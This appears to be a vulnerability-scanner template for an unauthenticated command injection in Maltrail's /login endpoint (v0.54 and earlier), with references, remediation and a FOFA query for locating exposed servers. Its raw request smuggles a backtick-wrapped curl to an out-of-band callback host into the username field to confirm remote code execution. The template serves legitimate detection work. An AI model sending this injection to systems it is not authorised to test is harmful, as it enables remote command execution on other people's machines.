id: maltrail-rce

info:
  name: Maltrail <= v0.54 - Unauthenticated OS Command Injection
  author: pussycat0x
  severity: critical
  description: |
    The subprocess.check_output function in mailtrail/core/http.py contains a command injection vulnerability in the params.get("username")parameter.
    An attacker can exploit this vulnerability by injecting arbitrary OS commands into the username parameter. The injected commands will be executed with the privileges of the running process. This vulnerability can be exploited remotely without authentication.
  remediation: Fixed in 0.55 Version
  reference:
    - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
    - https://github.com/stamparm/maltrail/commit/a299967318cc226c18a6a07d1be708e3f21edd39
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Server: Maltrail"
  tags: huntr,maltrail,rce,oast,oos

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        username=;`curl {{interactsh-url}}`

    matchers:
      - type: dsl
        dsl:
          - contains(body,'Login failed')
          - contains(interactsh_protocol,'dns')
          - contains(content_type, "text/plain")
        condition: and

# digest: 490a0046304402204271303319b619aa2e03b44c47153a1a54da57224963740b028912e4dd2505d40220685f0134ebc4a755b23f247b203ebc03971eae2cf5b306e8aa6cd0aaea97d11f:922c64590222798bb761d5b6d8e72950